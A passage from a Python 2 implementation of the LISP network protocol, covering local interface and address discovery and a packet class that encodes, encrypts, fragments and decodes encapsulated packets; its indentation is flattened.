try: my_sa = lisp_mymacs.has_key(sa)
except: my_sa = False
if (lisp_mymacs.has_key(da)): return(lisp_mymacs[da], sa, da, my_sa)
if (my_sa): return(lisp_mymacs[sa], sa, da, my_sa)
return(["?"], sa, da, my_sa)
#enddef
#
# lisp_get_local_interfaces
#
# Go populate the lisp.myinterfaces{} dictionary array. Key is device ID
# returned by the netifaces API.
#
def lisp_get_local_interfaces():
for device in netifaces.interfaces():
interface = lisp_interface(device)
interface.add_interface()
#endfor
return
#enddef
#
# lisp_get_loopback_address
#
# Get first loopback address on device lo which is not 127.0.0.1.
#
def lisp_get_loopback_address():
for addr in netifaces.ifaddresses("lo")[netifaces.AF_INET]:
if (addr["peer"] == "127.0.0.1"): continue
return(addr["peer"])
#endif
return(None)
#enddef
#
# lisp_is_mac_string
#
# Return True if the supplied string parameter is iin form of "xxxx-xxxx-xxxx".
# The input prefix could be "xxxx-xxxx-xxxx/48".
#
def lisp_is_mac_string(mac_str):
mac = mac_str.split("/")
if (len(mac) == 2): mac_str = mac[0]
return(len(mac_str) == 14 and mac_str.count("-") == 2)
#enddef
#
# lisp_get_local_macs
#
# Walk all interfaces, and for each ethernet interface, put the MAC address
# as a key into lisp_mymacs with a value of array of interface names.
#
def lisp_get_local_macs():
for device in netifaces.interfaces():
#
# Ignore bogus interface names that containers may create. Allow
# interfaces ones with colons, dashes and alphanumeric characters.
#
d = device.replace(":", "")
d = device.replace("-", "")
if (d.isalnum() == False): continue
#
# Need this for EOS because a "pimreg" interface will crash the call
# to netifaces.ifaddresses("pimreg").
#
try:
parms = netifaces.ifaddresses(device)
except:
continue
#endtry
if (parms.has_key(netifaces.AF_LINK) == False): continue
mac = parms[netifaces.AF_LINK][0]["addr"]
mac = mac.replace(":", "")
#
# GRE tunnels have strange MAC addresses (less than 48-bits). Ignore
# them.
#
if (len(mac) < 12): continue
if (lisp_mymacs.has_key(mac) == False): lisp_mymacs[mac] = []
lisp_mymacs[mac].append(device)
#endfor
lprint("Local MACs are: {}".format(lisp_mymacs))
return
#enddef
#
# lisp_get_local_rloc
#
# Use "ip addr show" on Linux and "ifconfig" on MacOS to get a local IPv4
# address. Get interface name from "netstat -rn" to grep for.
#
def lisp_get_local_rloc():
out = commands.getoutput("netstat -rn | egrep 'default|0.0.0.0'")
if (out == ""): return(lisp_address(LISP_AFI_IPV4, "", 32, 0))
#
# Get last item on first line of output.
#
out = out.split("\n")[0]
device = out.split()[-1]
addr = ""
macos = lisp_is_macos()
if (macos):
out = commands.getoutput("ifconfig {} | egrep 'inet '".format(device))
if (out == ""): return(lisp_address(LISP_AFI_IPV4, "", 32, 0))
else:
cmd = 'ip addr show | egrep "inet " | egrep "{}"'.format(device)
out = commands.getoutput(cmd)
if (out == ""):
cmd = 'ip addr show | egrep "inet " | egrep "global lo"'
out = commands.getoutput(cmd)
#endif
if (out == ""): return(lisp_address(LISP_AFI_IPV4, "", 32, 0))
#endif
#
# Check for multi-line. And favor returning private address so NAT
# traversal is used in lig.
#
addr = ""
out = out.split("\n")
for line in out:
a = line.split()[1]
if (macos == False): a = a.split("/")[0]
address = lisp_address(LISP_AFI_IPV4, a, 32, 0)
return(address)
#endif
return(lisp_address(LISP_AFI_IPV4, addr, 32, 0))
#endif
#
# lisp_get_local_addresses
#
# Use netifaces module to get a IPv4 and IPv6 local RLOC of this system.
# Return an array of 2 elements where [0] is an IPv4 RLOC and [1] is an
# IPv6 RLOC.
#
# Stores data in lisp.lisp_myrlocs[].
#
def lisp_get_local_addresses():
global lisp_myrlocs
#
# Check to see if we should not get the first address. Use environment
# variable (1-based addressing) to determine which one to get. If the
# number of addresses are less than the index, use the last one.
#
# The format of the environment variable could be <number> or
# <device>:<number>. The format could also be "<device>:" but make sure
# the user typed in a ":".
#
device_select = None
index = 1
parm = os.getenv("LISP_ADDR_SELECT")
if (parm != None and parm != ""):
parm = parm.split(":")
if (len(parm) == 2):
device_select = parm[0]
index = parm[1]
else:
if (parm[0].isdigit()):
index = parm[0]
else:
device_select = parm[0]
#endif
#endif
index = 1 if (index == "") else int(index)
#endif
rlocs = [None, None, None]
rloc4 = lisp_address(LISP_AFI_IPV4, "", 32, 0)
rloc6 = lisp_address(LISP_AFI_IPV6, "", 128, 0)
device_iid = None
for device in netifaces.interfaces():
if (device_select != None and device_select != device): continue
addresses = netifaces.ifaddresses(device)
if (addresses == {}): continue
#
# Set instance-ID for interface.
#
device_iid = lisp_get_interface_instance_id(device, None)
#
# Look for a non-link-local and non-loopback address.
#
if (addresses.has_key(netifaces.AF_INET)):
ipv4 = addresses[netifaces.AF_INET]
count = 0
for addr in ipv4:
rloc4.store_address(addr["addr"])
if (rloc4.is_ipv4_loopback()): continue
if (rloc4.is_ipv4_link_local()): continue
if (rloc4.address == 0): continue
count += 1
rloc4.instance_id = device_iid
if (device_select == None and
lisp_db_for_lookups.lookup_cache(rloc4, False)): continue
rlocs[0] = rloc4
if (count == index): break
#endfor
#endif
if (addresses.has_key(netifaces.AF_INET6)):
ipv6 = addresses[netifaces.AF_INET6]
count = 0
for addr in ipv6:
addr_str = addr["addr"]
rloc6.store_address(addr_str)
if (rloc6.is_ipv6_string_link_local(addr_str)): continue
if (rloc6.is_ipv6_loopback()): continue
count += 1
rloc6.instance_id = device_iid
if (device_select == None and
lisp_db_for_lookups.lookup_cache(rloc6, False)): continue
rlocs[1] = rloc6
if (count == index): break
#endfor
#endif
#
# Did we find an address? If not, loop and get the next interface.
#
if (rlocs[0] == None): continue
rlocs[2] = device
break
#endfor
addr1 = rlocs[0].print_address_no_iid() if rlocs[0] else "none"
addr2 = rlocs[1].print_address_no_iid() if rlocs[1] else "none"
device = rlocs[2] if rlocs[2] else "none"
device_select = " (user selected)" if device_select != None else ""
addr1 = red(addr1, False)
addr2 = red(addr2, False)
device = bold(device, False)
lprint("Local addresses are IPv4: {}, IPv6: {} from device {}{}, iid {}". \
format(addr1, addr2, device, device_select, device_iid))
lisp_myrlocs = rlocs
return((rlocs[0] != None))
#enddef
#
# lisp_get_all_addresses
#
# Return a list of all local IPv4 and IPv6 addresses from kernel. This is
# going to be used for building pcap and iptables filters. So no loopback or
# link-local addresses are returned.
#
def lisp_get_all_addresses():
address_list = []
for interface in netifaces.interfaces():
try: entry = netifaces.ifaddresses(interface)
except: continue
if (entry.has_key(netifaces.AF_INET)):
for addr in entry[netifaces.AF_INET]:
a = addr["addr"]
if (a.find("127.0.0.1") != -1): continue
address_list.append(a)
#endfor
#endif
if (entry.has_key(netifaces.AF_INET6)):
for addr in entry[netifaces.AF_INET6]:
a = addr["addr"]
if (a == "::1"): continue
if (a[0:5] == "fe80:"): continue
address_list.append(a)
#endfor
#endif
#endfor
return(address_list)
#enddef
#
# lisp_get_all_multicast_rles
#
# Grep lisp.config and get all multicast RLEs that appear in the configuration.
# Returns either an empty array or filled with one or more multicast addresses.
#
def lisp_get_all_multicast_rles():
rles = []
out = commands.getoutput('egrep "rle-address =" ./lisp.config')
if (out == ""): return(rles)
lines = out.split("\n")
for line in lines:
if (line[0] == "#"): continue
rle = line.split("rle-address = ")[1]
rle_byte = int(rle.split(".")[0])
if (rle_byte >= 224 and rle_byte < 240): rles.append(rle)
#endfor
return(rles)
#enddef
#------------------------------------------------------------------------------
#
# LISP packet contents. This keeps state for a LISP encapsulated packet that
# is processed by an RTR and ETR.
#
class lisp_packet():
def __init__(self, packet):
self.outer_source = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.outer_dest = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.outer_tos = 0
self.outer_ttl = 0
self.udp_sport = 0
self.udp_dport = 0
self.udp_length = 0
self.udp_checksum = 0
self.inner_source = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.inner_dest = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.inner_tos = 0
self.inner_ttl = 0
self.inner_protocol = 0
self.inner_sport = 0
self.inner_dport = 0
self.lisp_header = lisp_data_header()
self.packet = packet
self.inner_version = 0
self.outer_version = 0
self.encap_port = LISP_DATA_PORT
self.inner_is_fragment = False
self.packet_error = ""
self.gleaned_dest = False
#enddef
def encode(self, nonce):
#
# We could be running with no RLOCs found. If lisp_myrlocs[] is None,
# then self.outer_source will be LISP_AFI_NONE.
#
if (self.outer_source.is_null()): return(None)
#
# We have to build the LISP header here because if we are doing
# lisp-crypto, the ICV covers the LISP header. The function
# lisp_packet.encrypt() will put in the key-id.
#
if (nonce == None):
self.lisp_header.nonce(lisp_get_data_nonce())
elif (self.lisp_header.is_request_nonce(nonce)):
self.lisp_header.request_nonce(nonce)
else:
self.lisp_header.nonce(nonce)
#endif
self.lisp_header.instance_id(self.inner_dest.instance_id)
#
# Encrypt the packet. If something went wrong, send unencrypted packet
# by telling RLOC with key-id 0. For now, just use key-id 1. We are
# supporting just a single key.
#
self.lisp_header.key_id(0)
control = (self.lisp_header.get_instance_id() == 0xffffff)
if (lisp_data_plane_security and control == False):
addr_str = self.outer_dest.print_address_no_iid() + ":" + \
str(self.encap_port)
if (lisp_crypto_keys_by_rloc_encap.has_key(addr_str)):
keys = lisp_crypto_keys_by_rloc_encap[addr_str]
if (keys[1]):
keys[1].use_count += 1
packet, encrypted = self.encrypt(keys[1], addr_str)
if (encrypted): self.packet = packet
#endif
#endif
#endif
#
# Start with UDP header. Call hash_packet() to set source-port value.
# Unless we are doing lisp-crypto and nat-traversal.
#
self.udp_checksum = 0
if (self.encap_port == LISP_DATA_PORT):
if (lisp_crypto_ephem_port == None):
if (self.gleaned_dest):
self.udp_sport = LISP_DATA_PORT
else:
self.hash_packet()
#endif
else:
self.udp_sport = lisp_crypto_ephem_port
#endif
else:
self.udp_sport = LISP_DATA_PORT
#endif
self.udp_dport = self.encap_port
self.udp_length = len(self.packet) + 16
#
# IPv6 raw sockets need to have the UDP ports not swapped.
#
if (self.outer_version == 4):
sport = socket.htons(self.udp_sport)
dport = socket.htons(self.udp_dport)
else:
sport = self.udp_sport
dport = self.udp_dport
#endif
dport = socket.htons(self.udp_dport) if self.outer_version == 4 else \
self.udp_dport
udp = struct.pack("HHHH", sport, dport, socket.htons(self.udp_length),
self.udp_checksum)
#
# Encode the LISP header.
#
lisp = self.lisp_header.encode()
#
# Now prepend all 3 headers, LISP, UDP, outer header. See lisp_packet.
# fix_outer_header() for byte-swap details for the frag-offset field.
#
if (self.outer_version == 4):
tl = socket.htons(self.udp_length + 20)
frag = socket.htons(0x4000)
outer = struct.pack("BBHHHBBH", 0x45, self.outer_tos, tl, 0xdfdf,
frag, self.outer_ttl, 17, 0)
outer += self.outer_source.pack_address()
outer += self.outer_dest.pack_address()
outer = lisp_ip_checksum(outer)
elif (self.outer_version == 6):
outer = ""
# short = 6 << 12
# short |= self.outer_tos << 4
# short = socket.htons(short)
# tl = socket.htons(self.udp_length)
# outer = struct.pack("HHHBB", short, 0, tl, 17, self.outer_ttl)
# outer += self.outer_source.pack_address()
# outer += self.outer_dest.pack_address()
else:
return(None)
#endif
self.packet = outer + udp + lisp + self.packet
return(self)
#enddef
def cipher_pad(self, packet):
length = len(packet)
if ((length % 16) != 0):
pad = ((length/16) + 1) * 16
packet = packet.ljust(pad)
#endif
return(packet)
#enddef
def encrypt(self, key, addr_str):
if (key == None or key.shared_key == None):
return([self.packet, False])
#endif
#
# Pad packet to multiple of 16 bytes and call AES cipher.
#
packet = self.cipher_pad(self.packet)
iv = key.get_iv()
ts = lisp_get_timestamp()
aead = None
if (key.cipher_suite == LISP_CS_25519_CHACHA):
encrypt = chacha.ChaCha(key.encrypt_key, iv).encrypt
elif (key.cipher_suite == LISP_CS_25519_GCM):
k = binascii.unhexlify(key.encrypt_key)
try:
aesgcm = AES.new(k, AES.MODE_GCM, iv)
encrypt = aesgcm.encrypt
aead = aesgcm.digest
except:
lprint("You need AES-GCM, do a 'pip install pycryptodome'")
return([self.packet, False])
#endtry
else:
k = binascii.unhexlify(key.encrypt_key)
encrypt = AES.new(k, AES.MODE_CBC, iv).encrypt
#endif
ciphertext = encrypt(packet)
if (ciphertext == None): return([self.packet, False])
ts = int(str(time.time() - ts).split(".")[1][0:6])
#
# GCM requires 16 bytes of an AEAD MAC tag at the end of the
# ciphertext. Needed to interoperate with the Go implemenation of
# AES-GCM. The MAC digest was computed above.
#
if (aead != None): ciphertext += aead()
#
# Compute ICV and append to packet. ICV covers the LISP header, the
# IV, and the cipertext.
#
self.lisp_header.key_id(key.key_id)
lisp = self.lisp_header.encode()
icv = key.do_icv(lisp + iv + ciphertext, iv)
ps = 4 if (key.do_poly) else 8
string = bold("Encrypt", False)
cipher_str = bold(key.cipher_suite_string, False)
addr_str = "RLOC: " + red(addr_str, False)
auth = "poly" if key.do_poly else "sha256"
auth = bold(auth, False)
icv_str = "ICV({}): 0x{}...{}".format(auth, icv[0:ps], icv[-ps::])
dprint("{} for key-id: {}, {}, {}, {}-time: {} usec".format( \
string, key.key_id, addr_str, icv_str, cipher_str, ts))
icv = int(icv, 16)
if (key.do_poly):
icv1 = byte_swap_64((icv >> 64) & LISP_8_64_MASK)
icv2 = byte_swap_64(icv & LISP_8_64_MASK)
icv = struct.pack("QQ", icv1, icv2)
else:
icv1 = byte_swap_64((icv >> 96) & LISP_8_64_MASK)
icv2 = byte_swap_64((icv >> 32) & LISP_8_64_MASK)
icv3 = socket.htonl(icv & 0xffffffff)
icv = struct.pack("QQI", icv1, icv2, icv3)
#endif
return([iv + ciphertext + icv, True])
#enddef
def decrypt(self, packet, header_length, key, addr_str):
#
# Do ICV first. If it succeeds, then decrypt. Get ICV from packet and
# truncate packet to run hash over. Compare packet hash with computed
# hash.
#
if (key.do_poly):
icv1, icv2 = struct.unpack("QQ", packet[-16::])
packet_icv = byte_swap_64(icv1) << 64
packet_icv |= byte_swap_64(icv2)
packet_icv = lisp_hex_string(packet_icv).zfill(32)
packet = packet[0:-16]
ps = 4
hash_str = bold("poly", False)
else:
icv1, icv2, icv3 = struct.unpack("QQI", packet[-20::])
packet_icv = byte_swap_64(icv1) << 96
packet_icv |= byte_swap_64(icv2) << 32
packet_icv |= socket.htonl(icv3)
packet_icv = lisp_hex_string(packet_icv).zfill(40)
packet = packet[0:-20]
ps = 8
hash_str = bold("sha", False)
#endif
lisp = self.lisp_header.encode()
#
# Get the IV and use it to decrypt and authenticate..
#
if (key.cipher_suite == LISP_CS_25519_CHACHA):
iv_len = 8
cipher_str = bold("chacha", False)
elif (key.cipher_suite == LISP_CS_25519_GCM):
iv_len = 12
cipher_str = bold("aes-gcm", False)
else:
iv_len = 16
cipher_str = bold("aes-cbc", False)
#endif
iv = packet[0:iv_len]
#
# Compute ICV over LISP header and packet payload.
#
computed_icv = key.do_icv(lisp + packet, iv)
p_icv = "0x{}...{}".format(packet_icv[0:ps], packet_icv[-ps::])
c_icv = "0x{}...{}".format(computed_icv[0:ps], computed_icv[-ps::])
if (computed_icv != packet_icv):
self.packet_error = "ICV-error"
funcs = cipher_str + "/" + hash_str
fail = bold("ICV failed ({})".format(funcs), False)
icv_str = "packet-ICV {} != computed-ICV {}".format(p_icv, c_icv)
dprint(("{} from RLOC {}, receive-port: {}, key-id: {}, " + \
"packet dropped, {}").format(fail, red(addr_str, False),
self.udp_sport, key.key_id, icv_str))
dprint("{}".format(key.print_keys()))
#
# This is the 4-tuple NAT case. There another addr:port that
# should have the crypto-key the encapsulator is using. This is
# typically done on the RTR.
#
lisp_retry_decap_keys(addr_str, lisp + packet, iv, packet_icv)
return([None, False])
#endif
#
# Advance over IV for decryption.
#
packet = packet[iv_len::]
#
# Call AES or chacha cipher. Make sure for AES that
#
ts = lisp_get_timestamp()
if (key.cipher_suite == LISP_CS_25519_CHACHA):
decrypt = chacha.ChaCha(key.encrypt_key, iv).decrypt
elif (key.cipher_suite == LISP_CS_25519_GCM):
k = binascii.unhexlify(key.encrypt_key)
try:
decrypt = AES.new(k, AES.MODE_GCM, iv).decrypt
except:
self.packet_error = "no-decrypt-key"
lprint("You need AES-GCM, do a 'pip install pycryptodome'")
return([None, False])
#endtry
else:
if ((len(packet) % 16) != 0):
dprint("Ciphertext not multiple of 16 bytes, packet dropped")
return([None, False])
#endif
k = binascii.unhexlify(key.encrypt_key)
decrypt = AES.new(k, AES.MODE_CBC, iv).decrypt
#endif
plaintext = decrypt(packet)
ts = int(str(time.time() - ts).split(".")[1][0:6])
#
# Now decrypt packet and return plaintext payload.
#
string = bold("Decrypt", False)
addr_str = "RLOC: " + red(addr_str, False)
auth = "poly" if key.do_poly else "sha256"
auth = bold(auth, False)
icv_str = "ICV({}): {}".format(auth, p_icv)
dprint("{} for key-id: {}, {}, {} (good), {}-time: {} usec". \
format(string, key.key_id, addr_str, icv_str, cipher_str, ts))
#
# Keep self.packet the outer header, UDP header, and LISP header.
# We will append the plaintext in the caller once we parse the inner
# packet length so we can truncate any padding the encryptor put on.
#
self.packet = self.packet[0:header_length]
return([plaintext, True])
#enddef
def fragment_outer(self, outer_hdr, inner_packet):
frag_len = 1000
#
# Break up packet payload in fragments and put in array to have
# IP header added in next loop below.
#
frags = []
offset = 0
length = len(inner_packet)
while (offset < length):
frag = inner_packet[offset::]
if (len(frag) > frag_len): frag = frag[0:frag_len]
frags.append(frag)
offset += len(frag)
#endwhile
#
# Now fix outer IPv4 header with fragment-offset values and add the
# IPv4 value.
#
fragments = []
offset = 0
for frag in frags:
#
# Set frag-offset field in outer IPv4 header.
#
fo = offset if (frag == frags[-1]) else 0x2000 + offset
fo = socket.htons(fo)
outer_hdr = outer_hdr[0:6] + struct.pack("H", fo) + outer_hdr[8::]
#
# Set total-length field in outer IPv4 header and checksum.
#
l = socket.htons(len(frag) + 20)
outer_hdr = outer_hdr[0:2] + struct.pack("H", l) + outer_hdr[4::]
outer_hdr = lisp_ip_checksum(outer_hdr)
fragments.append(outer_hdr + frag)
offset += len(frag) / 8
#endfor
return(fragments)
#enddef
def send_icmp_too_big(self, inner_packet):
global lisp_last_icmp_too_big_sent
global lisp_icmp_raw_socket
elapsed = time.time() - lisp_last_icmp_too_big_sent
if (elapsed < LISP_ICMP_TOO_BIG_RATE_LIMIT):
lprint("Rate limit sending ICMP Too-Big to {}".format( \
self.inner_source.print_address_no_iid()))
return(False)
#endif
#
# Destination Unreachable Message - Too Big Message
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Type = 3 | Code = 4 | Checksum |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | unused | MTU = 1400 |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Internet Header + 64 bits of Original Data Datagram |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
mtu = socket.htons(1400)
icmp = struct.pack("BBHHH", 3, 4, 0, 0, mtu)
icmp += inner_packet[0:20+8]
icmp = lisp_icmp_checksum(icmp)
#
# Build IP header. Make source of ICMP invoking packet the destination
# and our address the source. We can get our address when we thought
# we could encap. So lisp_packet.outer_source has the RLOC address of
# this system.
#
host = inner_packet[12:16]
dest = self.inner_source.print_address_no_iid()
me = self.outer_source.pack_address()
#
# IP_HDRINCL requires the total-length and frag-offset fields to be
# host byte order. We need to build the total-length field just like
# lisp_packet.encode(), checksum, and then fix outer header. So that
# logic is semantically repliciated here. Same logic is in lisp_packet.
# fragment() as well.
#
tl = socket.htons(20+36)
ip = struct.pack("BBHHHBBH", 0x45, 0, tl, 0, 0, 32, 1, 0) + me + host
ip = lisp_ip_checksum(ip)
ip = self.fix_outer_header(ip)
ip += icmp
tb = bold("Too-Big", False)
lprint("Send ICMP {} to {}, mtu 1400: {}".format(tb, dest,
lisp_format_packet(ip)))
try:
lisp_icmp_raw_socket.sendto(ip, (dest, 0))
except socket.error, e:
lprint("lisp_icmp_raw_socket.sendto() failed: {}".format(e))
return(False)
#endtry
#
# Caller function sends packet on raw socket. Kernel routes out
# interface to destination.
#
lisp_last_icmp_too_big_sent = lisp_get_timestamp()
return(True)
def fragment(self):
global lisp_icmp_raw_socket
global lisp_ignore_df_bit
packet = self.fix_outer_header(self.packet)
#
# If inner header is IPv4, we will fragment the inner header and encap
# each fragment. If the inner header is IPv6, we will not add the
# Fragmentation Header into the inner IPv6 packet.
#
length = len(packet)
if (length <= 1500): return([packet], "Fragment-None")
packet = self.packet
#
# Fragment outer IPv4 header if inner packet is IPv6 (or Mac frame).
# We cannot fragment IPv6 packet since we are not the source.
#
if (self.inner_version != 4):
ident = random.randint(0, 0xffff)
outer_hdr = packet[0:4] + struct.pack("H", ident) + packet[6:20]
inner_packet = packet[20::]
fragments = self.fragment_outer(outer_hdr, inner_packet)
return(fragments, "Fragment-Outer")
#endif
#
# Fragment inner IPv4 packet.
#
outer_hdr_len = 56 if (self.outer_version == 6) else 36
outer_hdr = packet[0:outer_hdr_len]
inner_hdr = packet[outer_hdr_len: outer_hdr_len + 20]
inner_packet = packet[outer_hdr_len + 20::]
#
# If DF-bit is set, don't fragment packet. Do MTU discovery if
# configured with env variable.
#
frag_field = struct.unpack("H", inner_hdr[6:8])[0]
frag_field = socket.ntohs(frag_field)
if (frag_field & 0x4000):
if (lisp_icmp_raw_socket != None):
inner = packet[outer_hdr_len::]
if (self.send_icmp_too_big(inner)): return([], None)
#endif
if (lisp_ignore_df_bit):
frag_field &= ~0x4000
else:
df_bit = bold("DF-bit set", False)
dprint("{} in inner header, packet discarded".format(df_bit))
return([], "Fragment-None-DF-bit")
#endif
#endif
offset = 0
length = len(inner_packet)
fragments = []
while (offset < length):
fragments.append(inner_packet[offset:offset+1400])
offset += 1400
#endwhile
#
# Now put inner header and outer header on each fragment.
#
frags = fragments
fragments = []
mf = True if frag_field & 0x2000 else False
frag_field = (frag_field & 0x1fff) * 8
for frag in frags:
#
# Set fragment-offset and MF bit if not last fragment.
#
ff = frag_field / 8
if (mf):
ff |= 0x2000
elif (frag != frags[-1]):
ff |= 0x2000
#endif
ff = socket.htons(ff)
inner_hdr = inner_hdr[0:6] + struct.pack("H", ff) + inner_hdr[8::]
#
# Set length of fragment, set up offset for next fragment-offset,
# and header checksum fragment packet. Then prepend inner header
# to payload.
#
length = len(frag)
frag_field += length
l = socket.htons(length + 20)
inner_hdr = inner_hdr[0:2] + struct.pack("H", l) + \
inner_hdr[4:10] + struct.pack("H", 0) + inner_hdr[12::]
inner_hdr = lisp_ip_checksum(inner_hdr)
fragment = inner_hdr + frag
#
# Change outer header length and header checksum if IPv4 outer
# header. If IPv6 outer header, raw sockets prepends the header.
#
length = len(fragment)
if (self.outer_version == 4):
l = length + outer_hdr_len
length += 16
outer_hdr = outer_hdr[0:2] + struct.pack("H", l) + \
outer_hdr[4::]
outer_hdr = lisp_ip_checksum(outer_hdr)
fragment = outer_hdr + fragment
fragment = self.fix_outer_header(fragment)
#endif
#
# Finally fix outer UDP header length. Byte-swap it.
#
udp_len_index = outer_hdr_len - 12
l = socket.htons(length)
fragment = fragment[0:udp_len_index] + struct.pack("H", l) + \
fragment[udp_len_index+2::]
fragments.append(fragment)
#endfor
return(fragments, "Fragment-Inner")
#enddef
def fix_outer_header(self, packet):
#
# IP_HDRINCL requires the total-length and frag-offset fields to be
# in host byte order. So have to byte-swapped here. But when testing
# we (UPC guys) discovered the frag field didn't need swapping. The
# conclusion is that byte-swapping is necessary for MacOS but not for
# Linux OSes.
#
if (self.outer_version == 4 or self.inner_version == 4):
if (lisp_is_macos()):
packet = packet[0:2] + packet[3] + packet[2] + packet[4:6] + \
packet[7] + packet[6] + packet[8::]
else:
packet = packet[0:2] + packet[3] + packet[2] + packet[4::]
#endif
#endif
return(packet)
#enddef
def send_packet(self, lisp_raw_socket, dest):
if (lisp_flow_logging and dest != self.inner_dest): self.log_flow(True)
dest = dest.print_address_no_iid()
fragments, in_or_out = self.fragment()
for fragment in fragments:
if (len(fragments) != 1):
self.packet = fragment
self.print_packet(in_or_out, True)
#endif
try: lisp_raw_socket.sendto(fragment, (dest, 0))
except socket.error, e:
lprint("socket.sendto() failed: {}".format(e))
#endtry
#endfor
#enddef
def send_l2_packet(self, l2_socket, mac_header):
if (l2_socket == None):
lprint("No layer-2 socket, drop IPv6 packet")
return
#endif
if (mac_header == None):
lprint("Could not build MAC header, drop IPv6 packet")
return
#endif
packet = mac_header + self.packet
# try: l2_socket.send(packet)
# except socket.error, e:
# lprint("send_l2_packet(): socket.send() failed: {}".format(e))
# #endtry
# return
#
# Use tuntap tunnel interface instead of raw sockets for IPv6
# decapsulated packets.
#
l2_socket.write(packet)
return
#enddef
def bridge_l2_packet(self, eid, db):
try: dyn_eid = db.dynamic_eids[eid.print_address_no_iid()]
except: return
try: interface = lisp_myinterfaces[dyn_eid.interface]
except: return
try:
socket = interface.get_bridge_socket()
if (socket == None): return
except: return
try: socket.send(self.packet)
except socket.error, e:
lprint("bridge_l2_packet(): socket.send() failed: {}".format(e))
#endtry
#enddef
def is_lisp_packet(self, packet):
udp = (struct.unpack("B", packet[9])[0] == LISP_UDP_PROTOCOL)
if (udp == False): return(False)
port = struct.unpack("H", packet[22:24])[0]
if (socket.ntohs(port) == LISP_DATA_PORT): return(True)
port = struct.unpack("H", packet[20:22])[0]
if (socket.ntohs(port) == LISP_DATA_PORT): return(True)
return(False)
#enddef
def decode(self, is_lisp_packet, lisp_ipc_socket, stats):
self.packet_error = ""
packet = self.packet
orig_len = len(packet)
L3 = L2 = True
#
# Get version number of outer header so we can decode outer addresses.
#
header_len = 0
iid = 0
if (is_lisp_packet):
iid = self.lisp_header.get_instance_id()
version = struct.unpack("B", packet[0:1])[0]
self.outer_version = version >> 4
if (self.outer_version == 4):
#
# MacOS is zeroing the IP header checksum for a raw socket.
# If we receive this, bypass the checksum calculation.
#
orig_checksum = struct.unpack("H", packet[10:12])[0]
packet = lisp_ip_checksum(packet)
checksum = struct.unpack("H", packet[10:12])[0]
if (checksum != 0):
if (orig_checksum != 0 or lisp_is_macos() == False):
self.packet_error = "checksum-error"
if (stats):
stats[self.packet_error].increment(orig_len)
#endif
lprint("IPv4 header checksum failed for outer header")
if (lisp_flow_logging): self.log_flow(False)
return(None)
#endif
#endif
afi = LISP_AFI_IPV4
offset = 12
self.outer_tos = struct.unpack("B", packet[1:2])[0]
self.outer_ttl = struct.unpack("B", packet[8:9])[0]
header_len = 20
elif (self.outer_version == 6):
afi = LISP_AFI_IPV6
offset = 8
tos = struct.unpack("H", packet[0:2])[0]
self.outer_tos = (socket.ntohs(tos) >> 4) & 0xff
self.outer_ttl = struct.unpack("B", packet[7:8])[0]
header_len = 40
else:
self.packet_error = "outer-header-error"
if (stats): stats[self.packet_error].increment(orig_len)
lprint("Cannot decode outer header")
return(None)
#endif
self.outer_source.afi = afi
self.outer_dest.afi = afi
addr_length = self.outer_source.addr_length()
self.outer_source.unpack_address(packet[offset:offset+addr_length])
offset += addr_length
self.outer_dest.unpack_address(packet[offset:offset+addr_length])
packet = packet[header_len::]
self.outer_source.mask_len = self.outer_source.host_mask_len()
self.outer_dest.mask_len = self.outer_dest.host_mask_len()
#
# Get UDP fields
#
short = struct.unpack("H", packet[0:2])[0]
self.udp_sport = socket.ntohs(short)
short = struct.unpack("H", packet[2:4])[0]
self.udp_dport = socket.ntohs(short)
short = struct.unpack("H", packet[4:6])[0]
self.udp_length = socket.ntohs(short)
short = struct.unpack("H", packet[6:8])[0]
self.udp_checksum = socket.ntohs(short)
packet = packet[8::]
#
# Determine what is inside, a packet or a frame.
#
L3 = (self.udp_dport == LISP_DATA_PORT or
self.udp_sport == LISP_DATA_PORT)
L2 = (self.udp_dport in (LISP_L2_DATA_PORT, LISP_VXLAN_DATA_PORT))
#
# Get LISP header fields.
#
if (self.lisp_header.decode(packet) == False):
self.packet_error = "lisp-header-error"
if (stats): stats[self.packet_error].increment(orig_len)
if (lisp_flow_logging): self.log_flow(False)
lprint("Cannot decode LISP header")
return(None)
#endif
packet = packet[8::]
iid = self.lisp_header.get_instance_id()
header_len += 16
#endif
if (iid == 0xffffff): iid = 0
#
# Time to decrypt if K-bits set.
#
decrypted = False
key_id = self.lisp_header.k_bits
if (key_id):
addr_str = lisp_get_crypto_decap_lookup_key(self.outer_source,
self.udp_sport)
if (addr_str == None):
self.packet_error = "no-decrypt-key"
if (stats): stats[self.packet_error].increment(orig_len)
self.print_packet("Receive", is_lisp_packet)
ks = bold("No key available", False)
dprint("{} for key-id {} to decrypt packet".format(ks, key_id))
if (lisp_flow_logging): self.log_flow(False)
return(None)
#endif
key = lisp_crypto_keys_by_rloc_decap[addr_str][key_id]
if (key == None):
self.packet_error = "no-decrypt-key"
if (stats): stats[self.packet_error].increment(orig_len)
self.print_packet("Receive", is_lisp_packet)
ks = bold("No key available", False)
dprint("{} to decrypt packet from RLOC {}".format(ks,
red(addr_str, False)))
if (lisp_flow_logging): self.log_flow(False)
return(None)
#endif
#
# Decrypt and continue processing inner header.
#
key.use_count += 1
packet, decrypted = self.decrypt(packet, header_len, key,
addr_str)
if (decrypted == False):
if (stats): stats[self.packet_error].increment(orig_len)
if (lisp_flow_logging): self.log_flow(False)
return(None)
#endif
#endif
#
# Get inner header fields.
#
version = struct.unpack("B", packet[0:1])[0]
self.inner_version = version >> 4
if (L3 and self.inner_version == 4 and version >= 0x45):
packet_len = socket.ntohs(struct.unpack("H", packet[2:4])[0])
self.inner_tos = struct.unpack("B", packet[1:2])[0]
self.inner_ttl = struct.unpack("B", packet[8:9])[0]
